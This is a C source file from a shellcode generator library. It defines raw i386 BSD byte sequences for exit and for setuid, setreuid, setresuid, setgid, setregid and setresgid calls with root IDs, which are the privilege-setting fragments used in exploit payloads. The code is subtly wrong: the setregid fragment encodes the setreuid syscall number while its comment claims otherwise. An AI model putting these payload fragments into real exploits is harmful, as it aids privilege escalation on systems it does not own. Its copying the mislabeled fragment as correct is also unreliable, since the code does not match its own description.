/*
 *     __   ___   _
 *    /  \ |   \ | | /\---------<ShellCode Generator Library>----------------->
 *   / /\ \| |\ \| |/ /
 *  / /__\ \    /|   /          libShellCode is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 *
 *
 */


#include <stdio.h>
#include <stdlib.h>

char *EXIT_0;
char *SETUID_0;
char *SETREUID_0_0;
char *SETRESUID_0_0_0;
char *SETGID_0;
char *SETREGID_0_0;
char *SETRESGID_0_0_0;


/*
 * Function:    initialize_i386_bsd_codes()
 * Parameters:
 * Return:      
 * Description: Initialize the complete syscall funcion codes used to build 
 *              the ShellCodes on i386 BSD architecture.
 *
 */

void initialize_i386_bsd_codes()
{
  EXIT_0       = (char *) strdup("\x31\xc0"                 // xor    %eax,%eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\x40"                     // inc    %eax
                                 "\xcd\x80");               // int    $0x80


  SETUID_0     = (char *) strdup("\x31\xc0"                 // xor    %eax,%eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\xb0\x17"                 // mov    $0x17,%al
                                 "\xcd\x80");               // int    $0x80


  SETREUID_0_0 = (char *) strdup("\x31\xc0"                 // xor    %eax,%eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\xb0\x7e"                 // mov    $0x7e,%al
                                 "\xcd\x80");               // int    $0x80


  SETRESUID_0_0_0
               = (char *) strdup("\x31\xc0"                 // xor    %eax,%eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\x66\xb8\x37\x01"         // mov    $0x137,%ax
                                 "\xcd\x80");               // int    $0x80


  SETGID_0     = (char *) strdup("\x31\xc0"                 // xor    %eax,%eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\xb0\xb5"                 // mov    $0xb5,%al
                                 "\xcd\x80");               // int    $0x80


  SETREGID_0_0 = (char *) strdup("\x31\xc0"                 // xor    %eax,%eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\xb0\x7e"                 // mov    $0x7f,%al
                                 "\xcd\x80");               // int    $0x80


  SETRESGID_0_0_0
               = (char *) strdup("\x31\xc0"                 // xor    %eax,%eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\x66\xb8\x38\x01"         // mov    $0x138,%ax
                                 "\xcd\x80");               // int    $0x80
}


/*
 * Function:    free_i386_bsd_codes()
 * Parameters:
 * Return:
 * Description: Free the memory used for the i386 BSD codes
 *
 */

void free_i386_bsd_codes()
{
  free(EXIT_0);
  free(SETUID_0);
  free(SETREUID_0_0);
  free(SETRESUID_0_0_0);
  free(SETGID_0);
  free(SETREGID_0_0);
  free(SETRESGID_0_0_0);
}
